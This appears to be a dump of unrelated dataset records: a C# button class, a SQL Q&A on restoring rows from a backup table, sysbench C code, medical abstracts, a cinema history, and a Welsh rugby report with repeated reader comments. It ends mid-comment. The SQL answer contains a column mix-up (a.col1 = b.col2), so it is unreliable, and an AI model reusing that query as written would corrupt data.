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[ "using Microsoft.", "AspNetCore.", "Mvc.", "Rendering;\nusing System;\nusing System.", "Collections.", "Generic;\nusing System.", "Linq;\nusing System.", "Text;\nusing System.", "Threading.", "Tasks;\n\nnamespace Lynicon.", "Extensibility\n{\n /// <summary>\n /// Action button for operating on content items from the items list\n /// </summary>\n public class ItemsListButton : IRolesRequired\n {\n #region IRolesRequired Members\n\n public string RequiredRoles { get; set; }\n\n #endregion\n\n /// <summary>\n /// Button caption\n /// </summary>\n public string Caption { get; set; }\n\n /// <summary>\n /// Button posts a request to this url with data indicating all checked content items (see script in ItemLister.cshtml)\n /// </summary>\n public string Url { get; set; }\n\n /// <summary>\n /// Confirm message: if not empty, show this message before sending request\n /// </summary>\n public string ConfirmMessage { get; set; }\n\n /// <summary>\n /// Optional dropdown list for user data\n /// </summary>\n public List<SelectListItem> DropDown { get; set; }\n\n /// <summary>\n /// Optional placeholder item for dropdown\n /// </summary>\n public string DropDownPlaceholder { get; set; }\n\n /// <summary>\n /// Version mask to determine with what versions the button is visible (null for all)\n /// </summary>\n public Func<ItemVersion> VisibilityVersionMask { get; set; }\n }\n}\n" ]
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[ "Q:\n\nHow to restore SQL data from one table to another\n\nI have a backup table with 15,000 rows. ", "The data was directly copied from a main table. ", "I need to perform an UPDATE statement on the main table, using the data from the backup table. ", "Both tables are identical in structure and use a unique primary key called ID.", "\nHow do I loop through the backup table, find the matching record for each row in the main table, and then replace each record in main table with the matching record in the backup table?", "\nThanks\nEDIT:\nProposed Solution based on Sean Lange's comment:\nUPDATE a\nSET a.col1 = b.col1\n, a.col2 = b.col2\n\nFROM table1 a\nINNER JOIN table2 b\nON a.id = b.id\n\nA:\n\nYou can use a JOIN update to accomplish this. ", " Assuming they have matching primary key ID's, it should be quick and painless. ", "\nUPDATE table1\nSET a.col1 = b.col2\n, a.col2 = b.col2\n\nFROM table1 a\nINNER JOIN table2 b\nON a.id = b.id\n\n" ]
{ "pile_set_name": "StackExchange" }
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[ "/* Copyright (C) 2006 MySQL AB\n Copyright (C) 2006 Alexey Kopytov <[email protected]>\n\n This program is free software; you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation; either version 2 of the License, or\n (at your option) any later version.", "\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. ", " See the\n GNU General Public License for more details.", "\n\n You should have received a copy of the GNU General Public License\n along with this program; if not, write to the Free Software\n Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA\n*/\n\n#ifdef HAVE_CONFIG_H\n# include \"config.h\"\n#endif\n\n#include \"sb_script.h\"\n\n#ifdef HAVE_LUA\n# include \"script_lua.h\"\n#endif\n\nstatic sb_test_t test;\n\n/* Initialize interpreter with a given script name */\n\nsb_test_t *script_load(const char *testname)\n{\n test.sname = strdup(testname);\n\n#ifdef HAVE_LUA\n if (!", "script_load_lua(testname, &test))\n return &test;\n#endif\n \n return NULL;\n}\n" ]
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[ "![](", "edinbmedj74443-0101){#sp1 .i}\n\n![](", "edinbmedj74443-0102){#sp2 .ii}\n\n![](", "edinbmedj74443-0103){#sp3 .iii}\n\n![](", "edinbmedj74443-0104){#sp4 .iv}\n\n![](", "edinbmedj74443-0105){#sp5 .v}\n\n![](", "edinbmedj74443-0106){#sp6 .vi}\n\n![](", "edinbmedj74443-0107){#sp7 .vii}\n\n![](", "edinbmedj74443-0108){#sp8 .viii}\n\n![](", "edinbmedj74443-0109){#sp9 .ix}\n\n![](", "edinbmedj74443-0110){#sp10 .x}\n\n![](", "edinbmedj74443-0111){#sp11 .xi}\n\n![](", "edinbmedj74443-0112){#sp12 .xii}\n\n![](", "edinbmedj74443-0113){#sp13 .xiii}\n\n![](", "edinbmedj74443-0114){#sp14 .xiv}\n\n![](", "edinbmedj74443-0115){#sp15 .xv}\n\n![](", "edinbmedj74443-0116){#sp16 .xvi}\n\n![](", "edinbmedj74443-0117){#sp17 .xvii}\n\n![](", "edinbmedj74443-0118){#sp18 .xviii}\n\n![](", "edinbmedj74443-0119){#sp19 .xix}\n\n![](", "edinbmedj74443-0120){#sp20 .xx}\n\n![](", "edinbmedj74443-0121){#sp21 .xxi}\n\n![](", "edinbmedj74443-0122){#sp22 .xxii}\n\n![](", "edinbmedj74443-0123){#sp23 .xxiii}\n\n![](", "edinbmedj74443-0124){#sp24 .xxiv}\n\n![](", "edinbmedj74443-0125){#sp25 .xxv}\n\n![](", "edinbmedj74443-0126){#sp26 .xxvi}\n\n![](", "edinbmedj74443-0127){#sp27 .xxvii}\n\n![](", "edinbmedj74443-0128){#sp28 .xxviii}\n\n![](", "edinbmedj74443-0129){#sp29 .xxix}\n\n![](", "edinbmedj74443-0130){#sp30 .xxx}\n\n![](", "edinbmedj74443-0131){#sp31 .xxxi}\n\n![](", "edinbmedj74443-0132){#sp32 .xxxii}\n\n![](", "edinbmedj74443-0133){#sp33 .xxxiii}\n\n![](", "edinbmedj74443-0134){#sp34 .xxxiv}\n\n![](", "edinbmedj74443-0135){#sp35 .xxxv}\n\n![](", "edinbmedj74443-0136){#sp36 .xxxvi}\n" ]
{ "pile_set_name": "PubMed Central" }
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[ "Aldeburgh Cinema\n\nAldeburgh Cinema is one of the oldest, continuously running cinema houses in the United Kingdom. ", "It is located in the town of Aldeburgh, Suffolk. ", " It has hosted many cinematic and performing arts events, including live theatre, operas, art exhibitions and ballet transmissions from the National Theatre, New York's Metropolitan Opera, the Royal Opera House, the National Gallery, the British Museum and Moscow's Bolshoi Ballet. ", "Aldeburgh Cinema is the permanent home of the Aldeburgh Documentary Festival, run annually in November.", "\n\nHistory\nAldeburgh Cinema was founded in 1919 and has screened films regularly since then. ", "The auditorium was built onto the back of a 19th-century High Street store.", "\n\nIn the 1960s the theatre was in financial difficulties and was scheduled to close; members of the community came together to refurbish the building and to organize events in the theatre. ", "Among these was Susan Harrison, who in 2012 was presented with a British Empire Medal for her work in promoting film and theatre arts.", "\n\nIn 2008 Albeburgh Cinema was one of several in the UK which took part in the first live remote screening of a ballet from the National Theatre in London, using equipment provided by the government organized Digital Screen Network.", "\n\nThe theatre hosts a cinema club which in 2012 had about 1,200 members.", "\n\nIn 2013 the cinema employed the United Kingdom's oldest working projectionist, Neville Parry.", "\n\nIn 2015, the theatre was a comedy venue for the HighTide Festival.", "\n\nReferences \n\nQuick, Diana. ", "2010. \"", "Aldeburgh documentary festival: when fact is more riveting than fiction\". ", "The Guardian, posted 23 November. ", "Retrieved 8 October 2013.", "\n\nCategory:Cinemas in Suffolk\nCategory:Aldeburgh" ]
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[ "Producing desulfurized biogas through removal of sulfate in the first-stage of a two-stage anaerobic digestion.", "\nIn the present work, a two-stage anaerobic digestion system (TSADS) was newly designed to produce biogas with a greatly reduced H2 S content. ", "The role of first (sulfidogenic)-stage digester was not only acidogenesis but also sulfidogenesis (sulfate reduction to H2 S), which would minimize the input of H2 S-producing source in the followed second (methanogenic)-stage digester. ", "For the coexistence of acidogens and sulfate reducing bacteria (SRB) in the sulfidogenic-stage digester, it was found that pH played a crucial role. ", "The acidogenic activity was not affected within a pH range of 4.5-6.0, while it was important to maintain a pH at 5.5 to achieve a sulfate removal efficiency over 70%. ", "The highest sulfate removal attained was 78% at a hydraulic retention time (HRT) of 5 h at pH 5.5 ± 0.1. ", "The H2 S content in the biogas produced in the conventional single-stage digester (SSAD), used as a control, reached 1,650 ± 25 ppmv . ", "In contrast, the biogas produced in the methanogenic-stage digester of the developed process had an H2 S content of 200 ± 15 ppmv . ", "Microbial analysis, done by the next generation sequencing technique, clearly showed the changes in community under different operating conditions. ", "Desulfovibrio bastinii (4.9%) played a key role in sulfate removal in the sulfidogenic-stage of the TSADS owing to its characteristics of a short doubling time and growth in an acidic environment. ", "Biotechnol. ", "Bioeng. ", "2017;114: 970-979. ", "© 2016 Wiley Periodicals, Inc." ]
{ "pile_set_name": "PubMed Abstracts" }
[ 0, 0, 0, 0.006711409395973154, 0.005952380952380952, 0, 0.007407407407407408, 0, 0, 0, 0, 0, 0, 0 ]
[ "The Prozac boom and its placebogenic counterpart -- a culturally fashioned phenomenon.", "\nThe placebo effect describes the mind-body process of altering the body's physiological state as well as the brain's neurological state. ", "Catalyzed by the mind's believing in a certain drug, ritual, and/or treatment, it generally refers to the phenomenon of an ill individual recovering to health. ", "Subsequent to the Prozac boom (fluoxetine), which occurred during the 1980s and 90s in the United States, a new form of placebogenic phenomena was defined: 'cosmetic psychopharmacology', whereby the healthy individual is transformed to fit better in his/her cultural medium (defined by one's values and beliefs). ", "In order to discover how cultural metaphors (e.g. media-generated symbolism, social ideals) influence psychopharmacological treatment, this report investigates the following questions: Is the Prozac Boom culturally fashioned? ", "Is cosmetic psychopharmacology culturally fashioned? ", "Are cosmetic psychopharmacology and its ability to better the individual (relative to American ideals) a placebogenic phenomenon? ", "The data and speculation for the present report was obtained via a cultural and critical review. ", "It would appear that (1) the Prozac Boom and subsequently its by product, cosmetic psychopharmacology, are culturally fashioned; (2) cosmetic psychopharmacology is considered to result from one's belief in a drug and thus is placebo-influenced. ", "Media-generated symbolism, which represents and reciprocally fashions the ideals and values of that society, influence the social perceptions of a drug's effectiveness and the quality of a particular treatment. ", "In the clinical setting, the influential role of these preconceived notions about a certain treatment and/or drug need to be further considered and studied." ]
{ "pile_set_name": "PubMed Abstracts" }
[ 0.011627906976744186, 0, 0, 0.003194888178913738, 0, 0, 0, 0, 0.004081632653061225, 0, 0 ]
[ "psychmaster.comJudy Marshall, Ph.D. (clinical psychologist)Psychologist Judy Marshall, Ph.D. offers a series of inexpensive audio cassettes/cd-roms on various topics in mental health. ", "One program 'Coping with Trauma' (57 minutes) is available as a free mp3 download. ", "While the navigation on this site leaves something to be desired, there is a lot of nice art to look at. ", "A number of free well written articles are also available." ]
{ "pile_set_name": "Pile-CC" }
[ 0.010869565217391304, 0, 0, 0 ]
[ "Battling Dragons are once again left to ponder, ‘what if’\n\nSTILL in his garish special edition purple kit and weary after a bruising 80 minutes, scrum-half Jonathan Evans summed it up perfectly as he reflected on Newport Gwent Dragons’ performance against Bayonne.", "\n\n“We wanted to come off the field without any ‘ifs’ and without wondering what could have happened, but that’s exactly what we’ve got,” he lamented.", "\n\nIt’s what would have kept the players awake in the early hours of Sunday, that and the bumps and bruises after giving their all.", "\n\nIf only fly-half Lewis Robling had passed to wing Will Harries when the line was seemingly at his mercy in the first half.", "\n\nIf only they hadn’t allowed Bayonne back into the game when leading 16-6 approaching half-time.", "\n\nIf only full-back Tom Prydie had popped a simple pass to Tonderai Chavhanga when the former Springbok speedster had a run-in.", "\n\nIf only the mightily impressive Andy Tuilagi had not kicked turnover ball away when he seemed to have an overlap to his right.", "\n\nIf only they had sneaked over the line when the 80 minutes were gone and they rattled through 21 phases à la Munster in their pomp in search of a winner.", "\n\nThe Dragons put in a gutsy performance that restored some pride after a gloomy few weeks but they will also have plenty of regrets as they meet up again to try to plot the downfall of unbeaten Ulster on Friday evening.", "\n\nThey had the chances to add Bayonne to last year’s scalp of Perpignan but lacked the composure to nail their chances.", "\n\nYet there was much that was encouraging in their display against the Frenchmen.", "\n\nYes, it was another home defeat – a fifth in eight games – and it signals the end of their Amlin Challenge Cup campaign after just two games.", "\n\nBut the pack responded to recent justified criticism by, in the parlance they love, ‘fronting up’ to a pretty formidable Bayonne eight while the backs took it to their opposition and chanced their arm rather than going into their shells.", "\n\nThere were plenty of standout peformances, with Andy Tuilagi immense in midfield, number eight Toby Faletau getting through a mountain of work in attack and defence, blindside Tom Brown knocking Bayonne back and prop Owen Evans, on his first start, raising the question ‘where’s he been lurking?’ ", "after impressing in the loose and the set piece.", "\n\nThe challenge is to maintain the standard that they set against Bayonne rather than relapsing into the displays against Cardiff Blues and the Scarlets that leave them playing catch-up in the Pro12.", "\n\nThe Dragons started superbly and were in front after six minutes thanks to a training- ground move that saw Tuilagi crash the ball up before swift second-phase ball allowed Brown to take a short pass from scrum-half Evans to go dashing over from 25 metres.", "\n\nIt was then all about the kickers, with Prydie booting a pair of penalties to go along with his conversion and Bayonne’s metronomic fly-half Benjamin Boyet striking a pair of three-pointers.", "\n\nOn the half-hour came the first of the Dragons’ regrets when Robling made a magnificent break but failed to give the pass to Harries on his right.", "\n\nIt’s possible that the wing would have been tackled by Thibault Lacroix but he should have been given the chance.", "\n\nThat trip to the 22 did yield another three points through the boot of Prydie, but with the Dragons in control at 16-6 they left the door ajar for the French side before the break.", "\n\nHarries ran the ball when isolated in his own half rather than putting boot to ball and was turned over by lock Abdellatif Boutaty. ", "Bayonne went on the attack and after a couple of thrusts by Gabiriele Lovobalavu it was Aussie skipper Mark Chisholm who crashed over.", "\n\nBoyet converted, then added a penalty, and the Dragons had thrown away a 10-point lead that could have led to Gallic shrugs (albeit with a southern hemisphere twist) at half-time.", "\n\nIt was nip and tuck for all of the second half but the visitors, for whom former France Under-20s wing Marvin O’Connor had been a real threat, were just about worthy of their 22-19 lead as the clock struck 80.", "\n\nThen the Dragons stole a lineout – their first of the evening – and produced what is probably their best attack of the season so far, looking after the ball and asking questions of the Bayonne defence through 21 phases that marched them 40 metres back to their own line.", "\n\nIn the end it was a slow death, the television match official taking his time before confirming what most feared – that the Dragons had been held up over the line.", "\n\nThat they didn’t go for a drop goal to share the spoils in a must-win game is commendable, and that late, late attack showed what they are capable of.", "\n\nJust like the Pro12 win against Edinburgh, it wasn’t a performance that can mask the problems that exist at the region.", "\n\nBut the voices that roared them on in a dramatic late flurry told a story. ", "They were far happier safe in the knowledge that their team had given it everything.", "\n\nComments\n\nDai the Milk\n6:50pm Sun 21 Oct 12\n\nMen against boys. ", "It always will be as long as the not-so-super-clubs remain exclusive by retaining their names and refusing to become inclusive. ", "No crowds = no money = no players = no success. ", "This is the pattern until it collapses.", "\n\nMen against boys. ", "It always will be as long as the not-so-super-clubs remain exclusive by retaining their names and refusing to become inclusive. ", "No crowds = no money = no players = no success. ", "This is the pattern until it collapses.", "Dai the Milk\n\nMen against boys. ", "It always will be as long as the not-so-super-clubs remain exclusive by retaining their names and refusing to become inclusive. ", "No crowds = no money = no players = no success. ", "This is the pattern until it collapses.", "\n\nScore: 0\n\nDoberman1\n8:42am Mon 22 Oct 12\n\n\"If if's and buts were Beer and Nuts, we'd have ourselves a Party!\".... ", "They aren't and we lost again.", "\n\nIf DE was not the coach we might not be the laughing stock of the league and on a downward spiral to nowhere.", "\n\n\"If if's and buts were Beer and Nuts, we'd have ourselves a Party!\".... ", "They aren't and we lost again.", "\nIf DE was not the coach we might not be the laughing stock of the league and on a downward spiral to nowhere.", "Doberman1\n\n\"If if's and buts were Beer and Nuts, we'd have ourselves a Party!\".... ", "They aren't and we lost again.", "\n\nIf DE was not the coach we might not be the laughing stock of the league and on a downward spiral to nowhere.", "\n\nScore: 0\n\nRegionalist\n11:31am Mon 22 Oct 12\n\nDai the Milk wrote…\n\nMen against boys. ", "It always will be as long as the not-so-super-clubs remain exclusive by retaining their names and refusing to become inclusive. ", "No crowds = no money = no players = no success. ", "This is the pattern until it collapses.", "\n\nAn absurd view. ", "The weakness in the regions goes much deeper than your bitterness and xenophobia I'm afraid.", "\n\n[quote][p][bold]Dai the Milk[/bold] wrote:\nMen against boys. ", "It always will be as long as the not-so-super-clubs remain exclusive by retaining their names and refusing to become inclusive. ", "No crowds = no money = no players = no success. ", "This is the pattern until it collapses.[/p][/quote]An absurd view. ", "The weakness in the regions goes much deeper than your bitterness and xenophobia I'm afraid.", "Regionalist\n\nDai the Milk wrote…\n\nMen against boys. ", "It always will be as long as the not-so-super-clubs remain exclusive by retaining their names and refusing to become inclusive. ", "No crowds = no money = no players = no success. ", "This is the pattern until it collapses.", "\n\nAn absurd view. ", "The weakness in the regions goes much deeper than your bitterness and xenophobia I'm afraid.", "\n\nScore: 0\n\nSWBorderer\n12:12pm Mon 22 Oct 12\n\nI saw the headline \"If only\" and thought, if only we'd recognised the problem in the front row a couple of seasons ago we could have given our young, talented players a solid platform to play from and develop.", "\n\nIf only the men at the top had given Paul Turner some support instead of hanging him out to dry so they could install their puppet.", "\n\nIf only we had not been saddled with this hotch potch, masquerading as Regional Rugby, thought up by a foreign import with no understanding of Welsh Rugby.", "\nIf only......if only\n\nI saw the headline \"If only\" and thought, if only we'd recognised the problem in the front row a couple of seasons ago we could have given our young, talented players a solid platform to play from and develop.", "\nIf only the men at the top had given Paul Turner some support instead of hanging him out to dry so they could install their puppet.", "\nIf only we had not been saddled with this hotch potch, masquerading as Regional Rugby, thought up by a foreign import with no understanding of Welsh Rugby.", "\nIf only......if onlySWBorderer\n\nI saw the headline \"If only\" and thought, if only we'd recognised the problem in the front row a couple of seasons ago we could have given our young, talented players a solid platform to play from and develop.", "\n\nIf only the men at the top had given Paul Turner some support instead of hanging him out to dry so they could install their puppet.", "\n\nIf only we had not been saddled with this hotch potch, masquerading as Regional Rugby, thought up by a foreign import with no understanding of Welsh Rugby.", "\nIf only......if only\n\nScore: 0\n\nLinejudge\n12:50pm Mon 22 Oct 12\n\nIf only, we could get rid of these negative posts.", "\nIf only, people that made remarks on here knew what they were talking about!", "\nIf only, they could go back to watching football again, because they have no idea about rugby!", "\nEvery week thousands of TRUE Dragons supporters go to watch the games and will continue to watch the games and support the Dragons irrespective of the rubbish that it posted on here.", "\nActually, thinking about it, most of the posts on here refuse to go and watch the Dragons....THANK GOD FOR THAT!", "\n\nIf only, we could get rid of these negative posts.", "\nIf only, people that made remarks on here knew what they were talking about!", "\nIf only, they could go back to watching football again, because they have no idea about rugby!", "\nEvery week thousands of TRUE Dragons supporters go to watch the games and will continue to watch the games and support the Dragons irrespective of the rubbish that it posted on here.", "\nActually, thinking about it, most of the posts on here refuse to go and watch the Dragons....THANK GOD FOR THAT!Linejudge\n\nIf only, we could get rid of these negative posts.", "\nIf only, people that made remarks on here knew what they were talking about!", "\nIf only, they could go back to watching football again, because they have no idea about rugby!", "\nEvery week thousands of TRUE Dragons supporters go to watch the games and will continue to watch the games and support the Dragons irrespective of the rubbish that it posted on here.", "\nActually, thinking about it, most of the posts on here refuse to go and watch the Dragons....THANK GOD FOR THAT!", "\n\nScore: 0\n\nDai the Milk\n1:31pm Mon 22 Oct 12\n\nRegionalist and Linejudge.....you are part of the problem. ", "You've been sucked in.", "\n\nRegionalist and Linejudge.....you are part of the problem. ", "You've been sucked in.", "Dai the Milk\n\nRegionalist and Linejudge.....you are part of the problem. ", "You've been sucked in.", "\n\nScore: 0\n\nDragons den\n1:40pm Mon 22 Oct 12\n\nLinejudge.......spot on......the further away from the true supporters like us these guys stay, the better.", "\nWhen they judge and criticize the Dragons it says nothing about the Dragons, it merely says something about their own need to be critical.", "\n\nLinejudge.......spot on......the further away from the true supporters like us these guys stay, the better.", "\nWhen they judge and criticize the Dragons it says nothing about the Dragons, it merely says something about their own need to be critical.", "Dragons den\n\nLinejudge.......spot on......the further away from the true supporters like us these guys stay, the better.", "\nWhen they judge and criticize the Dragons it says nothing about the Dragons, it merely says something about their own need to be critical.", "\n\nScore: 0\n\nDoberman1\n2:07pm Mon 22 Oct 12\n\nLinejudge wrote…\n\nIf only, we could get rid of these negative posts.", "\nIf only, people that made remarks on here knew what they were talking about!", "\nIf only, they could go back to watching football again, because they have no idea about rugby!", "\nEvery week thousands of TRUE Dragons supporters go to watch the games and will continue to watch the games and support the Dragons irrespective of the rubbish that it posted on here.", "\nActually, thinking about it, most of the posts on here refuse to go and watch the Dragons....THANK GOD FOR THAT!", "\n\nST holder who goes to every game thank you.", "\nIf only people respected others right to comment,whatever their opinion. ", "It's called free speech, don't like it....move to China.", "\nIt's a results business professional sport and ours are not (for a long time) good enough. ", "When I go and watch sport on a local park for free I don't mind seeing amateur behaviour and performances, when I pay to watch proffesional sport I expect to see proffesionalism, not too much to ask is it?", "\nTRUTH HURTS?", "\n\n[quote][p][bold]Linejudge[/bold] wrote:\nIf only, we could get rid of these negative posts.", "\nIf only, people that made remarks on here knew what they were talking about!", "\nIf only, they could go back to watching football again, because they have no idea about rugby!", "\nEvery week thousands of TRUE Dragons supporters go to watch the games and will continue to watch the games and support the Dragons irrespective of the rubbish that it posted on here.", "\nActually, thinking about it, most of the posts on here refuse to go and watch the Dragons....THANK GOD FOR THAT![/p][/quote]ST holder who goes to every game thank you.", "\nIf only people respected others right to comment,whatever their opinion. ", "It's called free speech, don't like it....move to China.", "\nIt's a results business professional sport and ours are not (for a long time) good enough. ", "When I go and watch sport on a local park for free I don't mind seeing amateur behaviour and performances, when I pay to watch proffesional sport I expect to see proffesionalism, not too much to ask is it?", "\nTRUTH HURTS?Doberman1\n\nLinejudge wrote…\n\nIf only, we could get rid of these negative posts.", "\nIf only, people that made remarks on here knew what they were talking about!", "\nIf only, they could go back to watching football again, because they have no idea about rugby!", "\nEvery week thousands of TRUE Dragons supporters go to watch the games and will continue to watch the games and support the Dragons irrespective of the rubbish that it posted on here.", "\nActually, thinking about it, most of the posts on here refuse to go and watch the Dragons....THANK GOD FOR THAT!", "\n\nST holder who goes to every game thank you.", "\nIf only people respected others right to comment,whatever their opinion. ", "It's called free speech, don't like it....move to China.", "\nIt's a results business professional sport and ours are not (for a long time) good enough. ", "When I go and watch sport on a local park for free I don't mind seeing amateur behaviour and performances, when I pay to watch proffesional sport I expect to see proffesionalism, not too much to ask is it?", "\nTRUTH HURTS?", "\n\nScore: 0\n\nDragons den\n3:10pm Mon 22 Oct 12\n\n“Free speech”…. ", "that was exactly portrayed by Line judge of “China”…..\nDoberman1…Give your Season ticket to someone who will support and cheer on our boys through this very difficult (injury strewn time) and to someone who will help stamp out the outrageous negativity that we see on here.", "\nAnd then they can join the rest of us ST’s who will be at the Parade and away matches doing our little bit to help the boys along the way and up the table.", "\nIn my experience, there is only one motivation and that is desire and I believe the Dragons have plenty of desire on that pitch and thousands of other supporters have the desire to support them doing it .", "\n\n“Free speech”…. ", "that was exactly portrayed by Line judge of “China”…..\nDoberman1…Give your Season ticket to someone who will support and cheer on our boys through this very difficult (injury strewn time) and to someone who will help stamp out the outrageous negativity that we see on here.", "\nAnd then they can join the rest of us ST’s who will be at the Parade and away matches doing our little bit to help the boys along the way and up the table.", "\nIn my experience, there is only one motivation and that is desire and I believe the Dragons have plenty of desire on that pitch and thousands of other supporters have the desire to support them doing it .Dragons den\n\n“Free speech”…. ", "that was exactly portrayed by Line judge of “China”…..\nDoberman1…Give your Season ticket to someone who will support and cheer on our boys through this very difficult (injury strewn time) and to someone who will help stamp out the outrageous negativity that we see on here.", "\nAnd then they can join the rest of us ST’s who will be at the Parade and away matches doing our little bit to help the boys along the way and up the table.", "\nIn my experience, there is only one motivation and that is desire and I believe the Dragons have plenty of desire on that pitch and thousands of other supporters have the desire to support them doing it .", "\n\nScore: 0\n\nLinejudge\n3:15pm Mon 22 Oct 12\n\nDragons den......it will fall on deaf ears...\n\nDragons den......it will fall on deaf ears...Linejudge\n\nDragons den......it will fall on deaf ears...\n\nScore: 0\n\nten2two\n3:48pm Mon 22 Oct 12\n\nIm sorry but i agree with Doberman1, Im also a season ticket holder, and how people can be so positive is beyond me! ", "Yes we have injury problems but even with a fully fit front row we will struggle to provide any sort of platform, are set piece is a laughing stock and without that we cant compete, end of story. ", "I still support and cheer, i'm just frustrated with how things are going, and any other fan would feel the same IMO\n\nIm sorry but i agree with Doberman1, Im also a season ticket holder, and how people can be so positive is beyond me! ", "Yes we have injury problems but even with a fully fit front row we will struggle to provide any sort of platform, are set piece is a laughing stock and without that we cant compete, end of story. ", "I still support and cheer, i'm just frustrated with how things are going, and any other fan would feel the same IMOten2two\n\nIm sorry but i agree with Doberman1, Im also a season ticket holder, and how people can be so positive is beyond me! ", "Yes we have injury problems but even with a fully fit front row we will struggle to provide any sort of platform, are set piece is a laughing stock and without that we cant compete, end of story. ", "I still support and cheer, i'm just frustrated with how things are going, and any other fan would feel the same IMO\n\nScore: 0\n\nDoberman1\n3:50pm Mon 22 Oct 12\n\nDragons den wrote…\n\n“Free speech”…. ", "that was exactly portrayed by Line judge of “China”…..\nDoberman1…Give your Season ticket to someone who will support and cheer on our boys through this very difficult (injury strewn time) and to someone who will help stamp out the outrageous negativity that we see on here.", "\nAnd then they can join the rest of us ST’s who will be at the Parade and away matches doing our little bit to help the boys along the way and up the table.", "\nIn my experience, there is only one motivation and that is desire and I believe the Dragons have plenty of desire on that pitch and thousands of other supporters have the desire to support them doing it .", "\n\nMore from the DE apologists who simply refuse to accept a counter argument.", "\nI offer you the opportunity to talk us through what exactly DE has achieved since taking over.", "\n\nKeep a close eye on those \"thousands\" you refer to, won't be long before they dwindle away,fed up with another defeat as a result of the same old lack of proffesionalism...lo\nts of desire though.", "\n\nFor the record, on match days I think I cheer for my team as loudly as anyone, always around the 22 on the Hazell Terrace at the changing room end. ", "A lot closer to the pitch than DE ever gets.", "\n\n[quote][p][bold]Dragons den[/bold] wrote:\n“Free speech”…. ", "that was exactly portrayed by Line judge of “China”…..\nDoberman1…Give your Season ticket to someone who will support and cheer on our boys through this very difficult (injury strewn time) and to someone who will help stamp out the outrageous negativity that we see on here.", "\nAnd then they can join the rest of us ST’s who will be at the Parade and away matches doing our little bit to help the boys along the way and up the table.", "\nIn my experience, there is only one motivation and that is desire and I believe the Dragons have plenty of desire on that pitch and thousands of other supporters have the desire to support them doing it .[/p][/quote]More from the DE apologists who simply refuse to accept a counter argument.", "\nI offer you the opportunity to talk us through what exactly DE has achieved since taking over.", "\nKeep a close eye on those \"thousands\" you refer to, won't be long before they dwindle away,fed up with another defeat as a result of the same old lack of proffesionalism...lo\nts of desire though.", "\nFor the record, on match days I think I cheer for my team as loudly as anyone, always around the 22 on the Hazell Terrace at the changing room end. ", "A lot closer to the pitch than DE ever gets.", "Doberman1\n\nDragons den wrote…\n\n“Free speech”…. ", "that was exactly portrayed by Line judge of “China”…..\nDoberman1…Give your Season ticket to someone who will support and cheer on our boys through this very difficult (injury strewn time) and to someone who will help stamp out the outrageous negativity that we see on here.", "\nAnd then they can join the rest of us ST’s who will be at the Parade and away matches doing our little bit to help the boys along the way and up the table.", "\nIn my experience, there is only one motivation and that is desire and I believe the Dragons have plenty of desire on that pitch and thousands of other supporters have the desire to support them doing it .", "\n\nMore from the DE apologists who simply refuse to accept a counter argument.", "\nI offer you the opportunity to talk us through what exactly DE has achieved since taking over.", "\n\nKeep a close eye on those \"thousands\" you refer to, won't be long before they dwindle away,fed up with another defeat as a result of the same old lack of proffesionalism...lo\nts of desire though.", "\n\nFor the record, on match days I think I cheer for my team as loudly as anyone, always around the 22 on the Hazell Terrace at the changing room end. ", "A lot closer to the pitch than DE ever gets.", "\n\nScore: 0\n\ncorpardguy\n4:50pm Mon 22 Oct 12\n\nOnce again a gutsy performance in the first and last 20 mins. ", "Great that we didn't give up, but what happens in the middle 40??", "\nWe don't seem to have a game plan/style/cohesion, its just go out and play a game of rugby, Oh and try and win it by spoiling the other teams possession.", "\nThe article says the first try was a training ground move, do we have any others??? ", "The boys are fit enough and they can hold their own in the loose against a lot of the Rabo 12 outfits, but where's the game plan built around the team strengths?", "\nWe have a good (and pretty well covered) back row and a set of backs to be proud of topped off by a really good back three, thats a good deal more than a lot of the rest of the Rabo.have.", "\nI reckon after Xmas young Robbling will be a much better distributor and be moving the line well. ", "However he needs a good run there now with young Jones coming on after 65 mins (or Off after 40)depending how the match is going!", "\nIf we are winning by that much again just before half time, stop kicking, take all the tackles and KEEP possession at every opportunity. , ", "Second half start playing rugby again..... but no scoring against us in the last 10 mins of the half, its too important.", "\nWe need to win either ugly or pretty, but no more HOME losses.", "\n\nOnce again a gutsy performance in the first and last 20 mins. ", "Great that we didn't give up, but what happens in the middle 40??", "\nWe don't seem to have a game plan/style/cohesion, its just go out and play a game of rugby, Oh and try and win it by spoiling the other teams possession.", "\nThe article says the first try was a training ground move, do we have any others??? ", "The boys are fit enough and they can hold their own in the loose against a lot of the Rabo 12 outfits, but where's the game plan built around the team strengths?", "\nWe have a good (and pretty well covered) back row and a set of backs to be proud of topped off by a really good back three, thats a good deal more than a lot of the rest of the Rabo.have.", "\nI reckon after Xmas young Robbling will be a much better distributor and be moving the line well. ", "However he needs a good run there now with young Jones coming on after 65 mins (or Off after 40)depending how the match is going!", "\nIf we are winning by that much again just before half time, stop kicking, take all the tackles and KEEP possession at every opportunity. , ", "Second half start playing rugby again..... but no scoring against us in the last 10 mins of the half, its too important.", "\nWe need to win either ugly or pretty, but no more HOME losses.corpardguy\n\nOnce again a gutsy performance in the first and last 20 mins. ", "Great that we didn't give up, but what happens in the middle 40??", "\nWe don't seem to have a game plan/style/cohesion, its just go out and play a game of rugby, Oh and try and win it by spoiling the other teams possession.", "\nThe article says the first try was a training ground move, do we have any others??? ", "The boys are fit enough and they can hold their own in the loose against a lot of the Rabo 12 outfits, but where's the game plan built around the team strengths?", "\nWe have a good (and pretty well covered) back row and a set of backs to be proud of topped off by a really good back three, thats a good deal more than a lot of the rest of the Rabo.have.", "\nI reckon after Xmas young Robbling will be a much better distributor and be moving the line well. ", "However he needs a good run there now with young Jones coming on after 65 mins (or Off after 40)depending how the match is going!", "\nIf we are winning by that much again just before half time, stop kicking, take all the tackles and KEEP possession at every opportunity. , ", "Second half start playing rugby again..... but no scoring against us in the last 10 mins of the half, its too important.", "\nWe need to win either ugly or pretty, but no more HOME losses.", "\n\nScore: 0\n\nRobert Shillabeer\n5:51pm Mon 22 Oct 12\n\nLinejudge wrote…\n\nIf only, we could get rid of these negative posts.", "\nIf only, people that made remarks on here knew what they were talking about!", "\nIf only, they could go back to watching football again, because they have no idea about rugby!", "\nEvery week thousands of TRUE Dragons supporters go to watch the games and will continue to watch the games and support the Dragons irrespective of the rubbish that it posted on here.", "\nActually, thinking about it, most of the posts on here 